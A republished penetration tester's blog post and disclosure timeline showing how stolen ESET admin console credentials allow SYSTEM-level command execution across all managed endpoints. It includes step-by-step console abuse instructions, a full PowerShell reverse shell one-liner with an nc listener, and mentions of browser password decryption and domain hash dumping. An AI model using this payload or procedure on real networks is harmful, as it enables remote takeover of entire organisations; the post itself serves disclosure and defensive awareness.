How I Hacked Into Your Corporate Network Using Your Own Antivirus Agent

How I Hacked Into Your Corporate Network Using Your Own Antivirus Agent

by Angelo Ruwantha


Recently I was busy with one of my client project, which is a fully penetration testing assignment against his company after the external pentest, I’ve moved into internal pentest. The company itself has Microsoft windows environment with active directory configured and they have been using eset endpoint as their antivirus. After few hours, I was able to break into one of the server using very popular exploit ms17-***.

After few, minutes I found clear text passwords which they had saved in a web browser and I managed to decrypt all the passwords and moved into lateral movements. Then, I found ESET admin console passwords are along with them, so I logged into admin console and I saw most of the computers are connected to the ESET endpoint.

So I came up with this amazing idea, which is what if I can perform RCE against every connected device so iIcan get a shell from each of them. So I did some research and I found that ESET has a feature called Run Command Task[1]According to ESET documentation, it's mentioned that Run Command task can be used to execute specific command line instructions on the client and most important thing is that it executes the commands with NT AUTHORITY\SYSTEM Privilege. So after I found this, I was able to get into active directory servers and dumped the hashes and compromised entire network.

Then I reported about this issue to ESET security team and I got this reply from ESET Security Team: "We do not consider this as vulnerability — it should allow clients to launch commands, done in context of AGENT as LOCAL_SYSTEM. From practical point of view it allows full administration of machine assigned to ERA/ESMC server. Task is simple — BAT script is created with user defined content and launched. 
Security of ERA/ESMC environment is based on access to ERA/ESMC server. Once attacker get access to ERA/ESMC, he have access to whole network."

According to ESET security team looks like they don’t care about this issue very much, well but I have to say the impact is huge. If an attacker able to recovered the password of ERA server it’s gives full privilege to an attacker over the network, and finally to the sys admins never store your password plain text or in a web browser. Always make sure to use secure password store mechanisms.

POC

  1. Go to https://server_ip/era/webconsole/#id=CLIENTS
  2. Right click on any connected devices, that you want to do the RCE
  3. Click New Task, and fill up the basic info, such as task name and select Task to Run command, and then select settings tab and type the command you want to execute. Then, click Finish.

4.Then again select your target and click Run Task, and select your previous defined task, then select Trigger tab and make sure set trigger type: "As soon as possible". Then, click Finish.

5.Game over !

PowerShell Reverse Shell Payload[2]

  1. powershell –nop –exec bypass –c “$client = New-Object
    System.Net.Sockets.TCPClient(”,443);$stream = $client.GetStream();
    [byte[]]$bytes = 0..65535
    %%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {;$data = (New-Object -TypeName
    System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1
    Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> 
    ‘;$sendbyte = 
    ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendb
    yte,0,$sendbyte.Length);$stream.Flush()};$client.Close()“
  2. nc -lvp 443

Timeline:

Oct 10,2018: Initial discover

Jan 10,2019: Report submitted to [email protected]

Jan 14,2019:Requested an update on the case

Jan 23,2019:Requested an update on the case

Apr 11,2019:Another report submitted to [email protected]eset.com with POC and write up

Apr 22,2019:Requested an update on the case

May 5,2019: Requested more information and details on case

May 6,2019: found out its a feature of ESET AV

Reply from ESET Security Team: "We do not consider this as vulnerability — it should allow clients to launch commands, done in context of AGENT as LOCAL_SYSTEM. From practical point of view it allows full administration of machine assigned to ERA/ESMC server. Task is simple — BAT script is created with user defined content and launched. 
Security of ERA/ESMC environment is based on access to ERA/ESMC server. Once attacker get access to ERA/ESMC, he have access to whole network."

June 10,2019:Released POC to public

June 11,2019: Released Blog post

References

[1] https://help.eset.com/esmc_admin/70/en-US/client_tasks_run_command.html

[2] https://gist.github.com/ohpe/bdd9d4385f8e6df26c02448f1bcc7a25


About the Author

Angelo Ruwantha is currently working as a pentester in KPMG Sri Lanka. His interests are breaking and building stuff.


The article has been originally published at: https://medium.com/@ruwanthawin32/this-is-how-i-hacked-into-your-corporate-network-using-your-own-anti-virus-agent-1f891a890063


July 4, 2019

Leave a Reply

avatar

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  Subscribe  
Notify of

© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013